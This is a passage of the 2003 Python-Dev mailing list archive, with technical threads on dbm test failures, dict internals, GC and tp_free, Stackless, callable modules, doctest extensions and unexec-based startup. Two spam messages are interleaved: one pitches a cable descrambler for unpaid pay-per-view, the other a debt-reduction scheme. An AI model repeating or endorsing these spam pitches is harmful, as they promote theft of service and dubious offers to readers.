> simultaneously.  And guess what?  Now the darned tests pass using dbm! I 
> am going to do a completely clean compile and test again to make sure 
> this is not a fluke since the only change was ``cvs update`` for 
> test_bsddb185.py and that only changed how files were deleted.
> 

Well, I recompiled and the test is still passing.  The  only thing I am 
aware of that changed between the tests failing and passing was me 
changing the test to use shutil.rmtree to clean up after itself and 
renaming dbm.so and then putting its name back.  I have no idea why it 
is working now, but it is.

-Brett



From a4cwm5ewm@earthlink.net  Sun May 18 01:23:06 2003
From: a4cwm5ewm@earthlink.net (Kelley Lunsford)
Date: Sun, 18 May 03 00:23:06 GMT
Subject: [Python-Dev] 100% Free TV  vfzii
Message-ID: <fo70-ew5$g7$1wyk@2tvo.a0>

This is a multi-part message in MIME format.

--CFA0__4ED39__0CEF44
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Unlock Digital Cable

*PPV channels 
*Boxing and any other Sports Event on PPV 
*Adult Channels 
*And anything else on PPV channels 

CLICK HERE FOR MORE INFORMATION
http://www.a6zing29.com/xcart/customer/product.php?productid=3D16144&partn=
er=3Daffil21&r=3Dhgsezyzmolc  ri hma 

mutnwfjyc  iog v ltkyje b xo
ctqznlneo rgf zwa
jy ki soq
gn l ghpv


This is the NEWEST AND BEST Digital CATV Filter/Descrambler 
that can test your digital cable PPV purchase functions 
along with eliminating unwanted interference caused by 
your broadband connection. This is a "True" universal 
product. It will work on 99% of all digital cable systems 
in use today. 

** VERY SIMPLE TO HOOK UP **

*** ONLY $44.95 PLUS a FREE $20 GIFT ***

IF YOU CAN ORDER PPV THROUGH YOUR REMOTE, THEN THIS FILTER 
WILL WORK FOR YOU WE OFFER THE MOST ADVANCED TECHNOLOGY IN 
DIGITAL FILTERS ANYWHERE, DONT BE FOOLED BY IMITATIONS THAT 
WONT WORK. 

ATTENTION: Because the Cable Company has no way of telling 
you are using this product you need to notify them of any 
movie purchases 

CLICK HERE FOR MORE INFORMATION
http://www.a6zing29.com/xcart/customer/product.php?productid=3D16144&partn=
er=3Daffil21&r=3Drih  bglceosqf  hdzmscizvo n cmmis




















+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This email has been screened and filtered by our in house
""OPT-OUT"" system in compliance with state laws. If you
wish to "OPT-OUT" from this mailing as well as the lists 
of thousands of other email providers please visit  

http://www.a6zing29.com/1/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


ofqjfdllcqzd kxjg e shuvrmthvfwfi 
--CFA0__4ED39__0CEF44--



From skip@pobox.com  Sat May 17 23:03:20 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 17 May 2003 17:03:20 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67BBB.4090003@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
 <16070.13665.129282.617413@montanaro.dyndns.org>
 <3EC67BBB.4090003@ocf.berkeley.edu>
Message-ID: <16070.45480.640314.144944@montanaro.dyndns.org>

    Brett> No success for me when it is using dumbdbm:

    Brett> ======================================================================
    Brett> ERROR: test_anydbm_create (__main__.Bsddb185Tests)
    Brett> ----------------------------------------------------------------------
    Brett> Traceback (most recent call last):
    Brett>    File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
    Brett>      os.rmdir(tmpdir)
    Brett> OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'

This problem is fixed in CVS.  Have you updated?

    Brett> ... done.  Just used shutil.rmtree instead of the nested 'try'
    Brett> statements that called os.unlink and os.rmdir .  Now the tests
    Brett> pass for dumbdbm.  So it seems to be dbm.so for some reason.

This is just what I checked in.

Skip


From tim.one@comcast.net  Sun May 18 02:12:12 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 17 May 2003 21:12:12 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <006301c31b30$da69e8e0$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>

[Damien Morton]
> ...
> On the other hand, as Tim pointed out to me in a private email, there is
> so much overhead in just getting to the hashtable inner loop, going
> around that loop one time instead of two or three seems inconsequential.

For in-cache tables.  For out-of-cache tables, each trip around the loop is
deadly.  Since heavily used portions of small dicts are likely to be
in-cache no matter how they're implemented, that's what makes me dubious
about pouring lots of effort into reducing collisions for small dicts
specifically.

> ...
> There seem to be two different ways to get/set/del from a dictionary.
>
> The first is using PyDict_[Get|Set|Del]Item()
>
> The second is using the embarssingly named dict_ass_sub() and its
> partner dict_subscript().
>
> Which of these two access methods is most likely to be used?

My guess matches Guido's:  PyDict_*, except in programs making heavy use of
explicit Python dicts.  All programs use dicts under the covers for
namespace mapping, and, e.g., instance.attr and module.attr end up calling
PyDict_GetItem() directly.  Python-level explicit dict subscripting ends up
calling dict_*, essentially because Python has no idea at compile-time
whether the x in

    x[y]

*is* a dict, so generates code that goes thru the all-purpose type-dispatch
machinery.  On the third hand, some explicit-dict slinging code seems to use

    x = somedict.get(y)

everywhere, and dict_get() doesn't call PyDict_GetItem() or
dict_subscript().



From Raymond Hettinger" <python@rcn.com  Sun May 18 02:32:22 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Sat, 17 May 2003 21:32:22 -0400
Subject: [Python-Dev] SF oddity
Message-ID: <007101c31cdd$e4423440$125ffea9@oemcomputer>

When I look at www.python.org/sf/732174 , there is no Submit button on the screen.
But I see it for other docs and patches.  Is anyone else having the same issue?
Without a submit button, it is darned difficult to mark the bug as fixed and close it.

--R


From tim.one@comcast.net  Sun May 18 02:52:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 17 May 2003 21:52:18 -0400
Subject: [Python-Dev] SF oddity
In-Reply-To: <007101c31cdd$e4423440$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEPJEFAB.tim.one@comcast.net>

[Raymond Hettinger]
> When I look at www.python.org/sf/732174 , there is no Submit
> button on the screen.
> But I see it for other docs and patches.  Is anyone else having
> the same issue?
> Without a submit button, it is darned difficult to mark the bug
> as fixed and close it.

Look at the state of your browser's horizontal scrollbar, and scroll
waaaaaay to the right.  There's a very long line in this item's description,
and that pushes the Submit button off the edge of anything less than a
161-inch monitor <wink>.



From python@rcn.com  Sun May 18 03:01:13 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 17 May 2003 22:01:13 -0400
Subject: [Python-Dev] SF oddity
References: <LNBBLJKPBEHFEDALKOLCKEPJEFAB.tim.one@comcast.net>
Message-ID: <000201c31cf2$5a08dee0$125ffea9@oemcomputer>

> [Raymond Hettinger]
> > When I look at www.python.org/sf/732174 , there is no Submit
> > button on the screen.
> > But I see it for other docs and patches.  Is anyone else having
> > the same issue?
> > Without a submit button, it is darned difficult to mark the bug
> > as fixed and close it.

[Timbot]
> Look at the state of your browser's horizontal scrollbar, and scroll
> waaaaaay to the right.  There's a very long line in this item's description,
> and that pushes the Submit button off the edge of anything less than a
> 161-inch monitor <wink>.

Hmphh!

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From skip@mojam.com  Sun May 18 13:00:26 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 18 May 2003 07:00:26 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305181200.h4IC0Qa21569@manatee.mojam.com>

Bug/Patch Summary
-----------------

403 open / 3646 total bugs (-11)
141 open / 2161 total patches (+6)

New Bugs
--------

Problem With email.MIMEText Package (2003-05-12)
	http://python.org/sf/736407
allow HTMLParser error recovery (2003-05-12)
	http://python.org/sf/736428
markupbase parse_declaration cannot recognize comments (2003-05-12)
	http://python.org/sf/736659
forcing function to act like an unbound method dumps core (2003-05-13)
	http://python.org/sf/736892
CGIHTTPServer does not handle scripts in sub-dirs (2003-05-13)
	http://python.org/sf/737202
os.symlink docstring is ambiguous. (2003-05-13)
	http://python.org/sf/737291
need doc for new trace module (2003-05-14)
	http://python.org/sf/737734
Failed assert in stringobject.c (2003-05-14)
	http://python.org/sf/737947
Interpreter crash: sigfpe on Alpha (2003-05-14)
	http://python.org/sf/738066
Section 13.3: htmllib.HTMLParser constructor definition amen (2003-05-15)
	http://python.org/sf/738090
pdb doesn't find some source files (2003-05-15)
	http://python.org/sf/738154
crash error in glob.glob; directories with brackets (2003-05-15)
	http://python.org/sf/738361
csv.Sniffer docs need updating (2003-05-15)
	http://python.org/sf/738471
On Windows, os.listdir() throws incorrect exception (2003-05-15)
	http://python.org/sf/738617
urllib2 CacheFTPHandler doesn't work on multiple dirs (2003-05-16)
	http://python.org/sf/738973
array.insert and negative indices (2003-05-17)
	http://python.org/sf/739313

New Patches
-----------

Mutable PyCObject (2001-11-02)
	http://python.org/sf/477441
Improvement of cgi.parse_qsl function (2002-01-25)
	http://python.org/sf/508665
CGIHTTPServer execfile should save cwd  (2002-01-25)
	http://python.org/sf/508730
rlcompleter does not expand on [ ] (2002-04-22)
	http://python.org/sf/547176
ConfigParser.read() should return list of files read (2003-01-30)
	http://python.org/sf/677651
DESTDIR improvement (2003-05-12)
	http://python.org/sf/736413
Put DEFS back to Makefile.pre.in (2003-05-12)
	http://python.org/sf/736417
Trivial improvement to NameError message (2003-05-12)
	http://python.org/sf/736730
interpreter final destination location (2003-05-12)
	http://python.org/sf/736857
docs for interpreter final destination location  (2003-05-12)
	http://python.org/sf/736859
Port tests to unittest (Part 2) (2003-05-13)
	http://python.org/sf/736962
traceback module caches sources invalid (2003-05-13)
	http://python.org/sf/737473
minor codeop fixes (2003-05-14)
	http://python.org/sf/737999
for i in range(N) optimization (2003-05-15)
	http://python.org/sf/738094
fix for glob with directories which contain brackets (2003-05-15)
	http://python.org/sf/738389
Add use_default_colors support to curses module. (2003-05-17)
	http://python.org/sf/739124

Closed Bugs
-----------

Regular expression tests: SEGV on Mac OS (2001-04-16)
	http://python.org/sf/416526
CGIHTTPServer crashes Explorer in WinME (2001-05-31)
	http://python.org/sf/429193
MacPy21: sre "recursion limit" bug (2001-06-29)
	http://python.org/sf/437472
provide a documented serialization func (2001-10-02)
	http://python.org/sf/467384
Security review of pickle/marshal docs (2001-10-16)
	http://python.org/sf/471893
Improvement of cgi.parse_qsl function (2002-01-25)
	http://python.org/sf/508665
CGIHTTPServer execfile should save cwd (2002-01-25)
	http://python.org/sf/508730
metaclasses and 2.2 highlights (2002-02-08)
	http://python.org/sf/515137
bsddb keys corruption (2002-02-25)
	http://python.org/sf/522780
test_pyclbr: bad dependency for input (2002-03-12)
	http://python.org/sf/529135
Wrong exception from re.compile() (2002-04-18)
	http://python.org/sf/545855
regex segfault on Mac OS X (2002-04-19)
	http://python.org/sf/546059
rlcompleter does not expand on [ ] (2002-04-22)
	http://python.org/sf/547176
os.spawnv() fails with underscores (2002-06-30)
	http://python.org/sf/575770
Print line number of string if at EOF (2002-07-04)
	http://python.org/sf/577295
Build error using make VPATH feature (2002-10-22)
	http://python.org/sf/626926
Have exception arguments keep their type (2003-01-27)
	http://python.org/sf/675928
No documentation of static/dynamic python modules. (2003-03-12)
	http://python.org/sf/702157
Distutils documentation amputated (2003-04-01)
	http://python.org/sf/713722
datetime types don't work as bases (2003-04-13)
	http://python.org/sf/720908
_winreg doesn't handle NULL bytes in value names (2003-04-16)
	http://python.org/sf/722413
add timeout support in socket using modules (2003-04-17)
	http://python.org/sf/723287
Minor /Tools/Scripts/crlf.py bugs (2003-04-20)
	http://python.org/sf/724767
rexec not listed as dead (2003-04-29)
	http://python.org/sf/729817
Clarification of "pos" and "endpos" for match objects. (2003-05-04)
	http://python.org/sf/732124
telnetlib.read_until: float req'd for timeout (2003-05-08)
	http://python.org/sf/734806
cStringIO.StringIO (2003-05-09)
	http://python.org/sf/735535
libwinsound.tex is missing MessageBeep() description (2003-05-10)
	http://python.org/sf/735674

Closed Patches
--------------

xmlrpclib: Optional 'nil' support (2002-10-24)
	http://python.org/sf/628208
Remove type-check from urllib2 (2002-11-15)
	http://python.org/sf/639139
urllib2.Request's headers are case-sens. (2002-12-06)
	http://python.org/sf/649742
has_function() method for CCompiler (2003-04-07)
	http://python.org/sf/717152
DESTDIR variable patch (2003-04-09)
	http://python.org/sf/718286
socketmodule inet_ntop built when IPV6 is disabled (2003-04-30)
	http://python.org/sf/730603
make threading join() method return a value (2003-05-02)
	http://python.org/sf/731607
exit status of latex2html "ignored" (2003-05-04)
	http://python.org/sf/732143
build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
Docs for test package (2003-05-04)
	http://python.org/sf/732394
Python2.3b1 makefile improperly installs IDLE (2003-05-10)
	http://python.org/sf/735613
Python makefile may install idle in the wrong place (2003-05-10)
	http://python.org/sf/735614


From Silkz" <adfxhigdc@ctcreuna.cl  Sun May 18 19:29:30 2003
From: Silkz" <adfxhigdc@ctcreuna.cl (Silkz)
Date: Sun, 18 May 2003 11:29:30 -0700
Subject: [Python-Dev] finances got you down?
Message-ID: <50f401c31d6b$6bd25b00$606d8d23@fveoxdjsyagnl>

This is a multi-part message in MIME format.

------=_NextPart_4C7_4E5F_994C4929.682CCF36
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


------=_NextPart_4C7_4E5F_994C4929.682CCF36
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<META HTTP-EQUIV=3D=22Content-Type=22 CONTENT=3D=22text/html;charset=3Di=
so-8859-1=22>
<=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4.0 Transitional//EN=22>
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D=22text/html; charset=3Diso-8=
859-1=22>
<META content=3D=22MSHTML 6.00.2600.0=22 name=3DGENERATOR>
<STYLE></STYLE>
</HEAD><FONT face=3DArial>
<BODY>
<DIV><STRONG><FONT size=3D2>Reduce your debt in 3 minutes ... 
</FONT></STRONG></DIV>
<UL>
  <LI><STRONG><FONT size=3D2>lower finance charges</FONT></STRONG></LI>=

  <LI><STRONG><FONT size=3D2>end creditor harassment</FONT></STRONG></L=
I>
  <LI><STRONG><FONT size=3D2>no loan, no credit check 
needed</FONT></STRONG></LI></UL>
<BLOCKQUOTE dir=3Dltr style=3D=22MARGIN-RIGHT: 0px=22>
  <BLOCKQUOTE dir=3Dltr style=3D=22MARGIN-RIGHT: 0px=22>
    <BLOCKQUOTE dir=3Dltr style=3D=22MARGIN-RIGHT: 0px=22>
      <DIV><STRONG><A 
      href=3D=22http://marketingmarketing.net/phoneOne/?N=3D11000=22><F=
ONT size=3D2>for 
      more info go here</FONT></A></STRONG></DIV></BLOCKQUOTE></BLOCKQU=
OTE>
  <DIV dir=3Dltr><FONT color=3D=23808080 size=3D1></FONT>&nbsp;</DIV>
  <DIV dir=3Dltr><FONT color=3D=23808080 size=3D1><A 
  href=3D=22http://marketingmarketing.net/removal/=22><STRONG>If you do=
n't want more 
  emails from us go here</STRONG></A></FONT></DIV></BLOCKQUOTE>
<DIV><FONT size=3D2></FONT>&nbsp;</DIV></BODY></HTML></FONT>

------=_NextPart_4C7_4E5F_994C4929.682CCF36--



From jim@zope.com  Sun May 18 19:28:55 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 18 May 2003 14:28:55 -0400
Subject: [Python-Dev] doctest extensions
Message-ID: <3EC7D0E7.9000705@zope.com>

I've written some doctest extensions to:

- Generate a unitest (pyunit) test suite from a module with doctest
   tests. Each doc string containing one or more doctest tests becomes
   a test case.

   If a test fails, an error message is included in the unittest
   output that has the module file name and the approximate line number
   of the docstring containing the failed test formatted in a way
   understood by emacs error parsing. This is important. ;)

- Debug doctest tests.  Normally, doctest tests can't be debugged
   with pdb because, while they are running, doctest has taken over
   standard output.  This tool extracts the tests in a doc string
   into a separate script and runs pdb on it.

- Extract a doctest doc string into a script file.

I think that these would be good additions to doctest and propose
to add them,

The current source can be found here:

   http://cvs.zope.org/Zope3/src/zope/testing/doctestunit.py?rev=HEAD&content-type=text/vnd.viewcvs-markup

I ended up using a slightly different (and simpler) strategy for
finding docstrings than doctest uses.  This might be an issue.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From guido@python.org  Sun May 18 20:02:55 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 15:02:55 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 15:29:54 EDT."
 <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
Message-ID: <200305181902.h4IJ2ti17624@pcp02138704pcs.reston01.va.comcast.net>

> PEP 253 may be partly out of date here -- or not.  In the section on
> creating a subclassable type, it says:
> 
> """
>    The base type must do the following:
> 
>       - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
> 
>       - Declare and use tp_new(), tp_alloc() and optional tp_init()
>         slots.
> 
>       - Declare and use tp_dealloc() and tp_free().
> 
>       - Export its object structure declaration.
> 
>       - Export a subtyping-aware type-checking macro.
> """
> 
> This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
> says both are required.  For a subclassable type, I believe both must
> actually be implemented too.
> 
> For a non-subclassable type, I expect they're optional.  But if you don't
> define tp_free in that case, then I believe you must also not do the
> 
>     obj->ob_type->tp_free(obj)
> 
> business in the tp_dealloc slot (else it will segfault).

PyType_Ready() inherits tp_free from the base class, so it's optional.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:33:44 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:33:44 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 16:30:47 EDT."
 <3EC54A77.7090106@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com> <3EC51B12.8070407@zope.com>
 <1053106533.453.78.camel@slothrop.zope.com> <3EC53D09.3050505@zope.com>
 <1053114159.457.117.camel@slothrop.zope.com> <3EC54A77.7090106@zope.com>
Message-ID: <200305182033.h4IKXi317732@pcp02138704pcs.reston01.va.comcast.net>

> I don't know wht PyDict_New doesn't just call the dict type.
> Maybe doing things in-line like this is just an optimization.

Yes; and because PyDict_New is much older than callable type objects.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:39:30 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:39:30 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 17:37:07 EDT."
 <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>
Message-ID: <200305182039.h4IKdU717764@pcp02138704pcs.reston01.va.comcast.net>

> Guido, would you be agreeable to making this magic even more magical?  It
> seems to me that we can know whether the current type intends to participate
> in cyclic gc, and give it a correct default tp_free value instead if so.
> The hairier type_new() function already has this extra level of
> Py_TPFLAGS_HAVE_GC-dependent magic for dynamically created types, setting
> tp_free to PyObject_Del in one case and to PyObject_GC_Del in the other.
> PyType_Ready() can supply a wrong deallocation function by default
> ("explicit is better than implicit" has no force when talking about
> PyType_Ready() <wink>).

Yes, I think this is the right thing to do -- either only inherit
tp_free when the GC bit of the base and derived class are the same, or
-- in addition -- special case inheriting PyObject_Del and turn it
into PyObject_GC_Del when the base class adds the GC bit.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:42:34 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:42:34 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: "Your message of Fri, 16 May 2003 13:45:25 -0800."
 <200305161345.25415.troy@gci.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
Message-ID: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>

> "Why in the world would you want callable modules you ask?"  I 
> don't have a real need, but I often see the line blurred between package, 
> module, and class.

Please don't try to blur the line between module and class.  This has
been proposed many times, and the net result IMO is always more
confusion and no more power.  This is also why in 2.3, modules are no
longer subclassable.

If you really need to have a module that has behavior beyond what a
module can offer, the officially sanctioned way is to stick an
instance of a class in sys.modules[__name__] from inside the module's
code.

(I would explain more about *why* I think it's a really bad idea, but
I'm officially on vacation.)

--Guido van Rossum (home page: http://www.python.org/~guido/)



From guido@python.org  Sun May 18 22:04:40 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 17:04:40 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Sat, 17 May 2003 01:52:20 +0200."
 <3EC579B4.9000303@tismer.com>
References: <3EC579B4.9000303@tismer.com>
Message-ID: <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>

> In the last months, I made very much progress with Stackless 3.0 .
> Finally, I was able to make much more of Python stackless
> (which means, does not use recursive interpreter calls) than
> I could achive with 1.0 .
> 
> There is one drawback with this, and I need advice:
> Compared to older Python versions, Py 2.2.2 and up uses
> more indirection through C function pointers than ever.
> This blocked my implementation of stackless versions, in
> the first place.
> 
> Then the idea hit me like a blizzard:
> Most problems simply vanish if I add another slot to the
> PyMethodDef structure, which is NULL by default:
> ml_meth_nr is a function pointer with the same semantics
> as ml_meth, but it tries to perform its action without
> doing a recursive call. It tries instead to push a frame
> and to return Py_UnwindToken.
> Doing this change made Stackless crystal clear and simple:
> A C extension not aware of Stackless does what it does
> all the time: call ml_meth.
> Stackless aware C code (like my modified ceval.c code)
> calls the ml_meth_nr slots, instead, which either defaults
> to the ml_meth code, or has a special version which avoids
> recursive interpreter calls.
> I also added a tp_call_nr slot to typeobject, for similar
> reasons.
> 
> While this is just great for me, yielding complete
> source code compatability, it is a slight drawback, since
> almost all extension modules make use of the PyMethodDef
> structure. Therefore, binary compatability of Stackless
> has degraded, dramatically.
> 
> I'm now in some kind of dilemma:
> On the one side, I'm happy with this solution (while I have
> to admit that it is not too inexpensive, but well, all the
> new descriptor objects are also not cheap, but just great),
> on the other hand, simply replacing python22.dll is no longer
> sufficient. You need to re-compile everything, which might
> be a hard thing on Windows (win32 extensions, wxPython).
> Sure, I would stand this, if there is no alternative, I would
> have to supply a complete replacement package of everything.
> 
> Do you (does anybody) have an alternative suggestion how
> to efficiently maintain a "normal" and a "non-recursive"
> version of a method without changing the PyMethodDef struc?
> 
> Alternatively, would it be reasonable to ask the Python core
> developers, if they would accept to augment PyMethodDef and
> PyTypeObject with an extra field (default NULL, no maintenance),
> just for me and Stackless?
> 
> Many thanks for any reply - sincerely -- chris

I don't think we can just add an extra field to PyMethodDef, because
it would break binary incompatibility.  Currently, in most cases, a
3r party extension module compiled for an earlier Python version can
still be used with a later version.  Because PyMethodDef is used as an
array, adding a field to it would break this.

I have less of a problem with extending PyTypeObject, it grows all the
time and the tp_flags bits tell you how large the one you've got is.
(I still have some problems with this, because things that are of no
use to the regular Python core developers tend to either confuse them,
or be broken on a regular basis.)

Maybe you could get away with defining an alternative structure for
PyMethodDef and having a flag in tp_flags say which it is; there are
plenty of unused bits and I don't mind reserving one for you.  Then
you'd have to change all the code that *uses* tp_methods, but there
isn't much of that; in fact, the only place I see is in typeobject.c.

If this doesn't work for you, maybe you could somehow fold the two
implementation functions into one, and put something special in the
argument list to signal that the non-recursive version is wanted?
(Thinking aloud here -- I don't know exactly what the usage pattern of
the nr versions will be.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim@zope.com  Sun May 18 22:42:28 2003
From: tim@zope.com (Tim Peters)
Date: Sun, 18 May 2003 17:42:28 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <200305182039.h4IKdU717764@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBAEGAB.tim@zope.com>

[Guido]
> Yes, I think this is the right thing to do -- either only inherit
> tp_free when the GC bit of the base and derived class are the same,

Jim is keen to have gc'able classes defined in C get the right deallocation
function by magic.  In these cases, he leaves tp_free NULL, but indicates
gc-ability in tp_flags.  tp_base becomes "object" by magic then, and the GC
bits are not the same, and neither inheriting object.tp_free nor leaving
derived_class.tp_free NULL can work.  It seems like a reasonable thing to me
to want it to work, so on to the next:

> or -- in addition -- special case inheriting PyObject_Del and turn it
> into PyObject_GC_Del when the base class adds the GC bit.

That's what I had in mind, s/base/derived/, plus raising an exception if a
gc'able class explicitly sets tp_free to PyObject_Del (probably a
cut-'n-paste error when that happens, or that gc-ability was tacked on to a
previously untracked type).

If that's all OK, enjoy your vacation, and I'll take care of this (for 2.3
and 2.2.3).




From troy@gci.net  Sun May 18 23:07:37 2003
From: troy@gci.net (Troy Melhase)
Date: Sun, 18 May 2003 14:07:37 -0800
Subject: [Python-Dev] a strange case
In-Reply-To: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
 <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200305181407.37880.troy@gci.net>

> Please don't try to blur the line between module and class.  This has
> been proposed many times, and the net result IMO is always more
> confusion and no more power.  This is also why in 2.3, modules are no
> longer subclassable.

Loud and clear!

> (I would explain more about *why* I think it's a really bad idea, but
> I'm officially on vacation.)

"There should be one-- and preferably only one --obvious way to do it" if I 
had to guess.  Happy holidays.

-troy


From walter@livinglogic.de  Sun May 18 23:19:18 2003
From: walter@livinglogic.de (=?ISO-8859-1?Q?Walter_D=F6rwald?=)
Date: Mon, 19 May 2003 00:19:18 +0200
Subject: [Python-Dev] a strange case
In-Reply-To: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org> <200305161345.25415.troy@gci.net> <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC806E6.3040204@livinglogic.de>

Guido van Rossum wrote:

>>"Why in the world would you want callable modules you ask?"  I=20
>>don't have a real need, but I often see the line blurred between packag=
e,=20
>>module, and class.
>=20
> Please don't try to blur the line between module and class.  This has
> been proposed many times,

It sounds familiar! ;)

> and the net result IMO is always more
> confusion and no more power.  This is also why in 2.3, modules are no
> longer subclassable.
>=20
> If you really need to have a module that has behavior beyond what a
> module can offer, the officially sanctioned way is to stick an
> instance of a class in sys.modules[__name__] from inside the module's
> code.

But reload() won't work for these pseudo modules (See
http://www.python.org/sf/701743). What about the imp module?

> (I would explain more about *why* I think it's a really bad idea, but
> I'm officially on vacation.)

Sure, this can wait.

Bye,
    Walter D=F6rwald




From jepler@unpythonic.net  Mon May 19 02:22:14 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 18 May 2003 20:22:14 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <1053112171.2342.7.camel@barry>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org> <1053112171.2342.7.camel@barry>
Message-ID: <20030519012212.GA10317@unpythonic.net>

On Fri, May 16, 2003 at 03:09:31PM -0400, Barry Warsaw wrote:
> Skip, you're going about this all wrong.  We already have the technology
> to start Python up blazingly fast.  All you have to do <wink> is port
> XEmacs's unexec code.  Then you load up Python with all the modules you
> think you're going to need, unexec it, then the next time it starts up
> like lightening.  Disk space is cheap!

I gave it a try, starting with 2.3b1 and using FSF Emacs 21.3's unexelf.c.
An unexec'd binary loads faster than 'python -S -c pass', and seems to
work properly with two exceptions and a few limitations.

The only change to Python is in main(): I use mallopt() to force all
allocations to go through brk() instead of through mmap(), because unexec
doesn't support mmap'd memory.  I also used Modules/Setup.local to make
some normally-shared modules not shared (for the same reason).

dump.py loads the requested modules (-<module> forces the module to *not*
be found) and then calls unexec(), producing a new binary with the given
name.

$ time ./python -S -c pass         # best 'real' of 5 runs
real    0m0.054s
user    0m0.040s
sys     0m0.010s
$ time ./python -c 'import cgi'    # best 'real' of 5 runs
real    0m0.127s
user    0m0.110s
sys     0m0.010s
$ strace -e open ./python -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
     88
$ ./python dump.py cgipython -_ssl cgi
$ time ./cgipython -c 'import cgi' # best 'real' of 5 runs
real    0m0.039s
user    0m0.020s
sys     0m0.020s
$ strace -e open ./cgipython -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
      9
$ ./python dump.py dython
-rwxrwxr-x    1 jepler   jepler    4983713 May 18 19:42 cgipython
-rwxrwxr-x    1 jepler   jepler    3603737 May 18 19:39 python
-rwxrwxr-x    1 jepler   jepler    4541345 May 18 19:55 dython

(a minimal unexec'd python is about 90k bigger than the regular Python
binary)

I'm running the test suite now .. it hangs in test_signal for some reason.  
test_thread seems to hang too, which may be related.  (but test_threading
completes?)

$ ./dython Lib/test/regrtest.py -x test_signal -x test_thread
[...]
225 tests OK.
26 tests skipped:
    test_aepack test_al test_bsddb3 test_bz2 test_cd test_cl
    test_curses test_email_codecs test_gl test_imgfile
    test_linuxaudiodev test_macfs test_macostools test_nis
    test_normalization test_ossaudiodev test_pep277 test_plistlib
    test_scriptpackages test_socket_ssl test_socketserver
    test_sunaudiodev test_timeout test_urllibnet test_winreg
    test_winsound
1 skip unexpected on linux2:
    test_bz2

Well, if it worked right it'd sure be interesting.  OTOH, unexelf.c is
GPL'd and there's also the nightmare of different unex* for different
platforms.  

Jeff

########################################################################
# dump.py
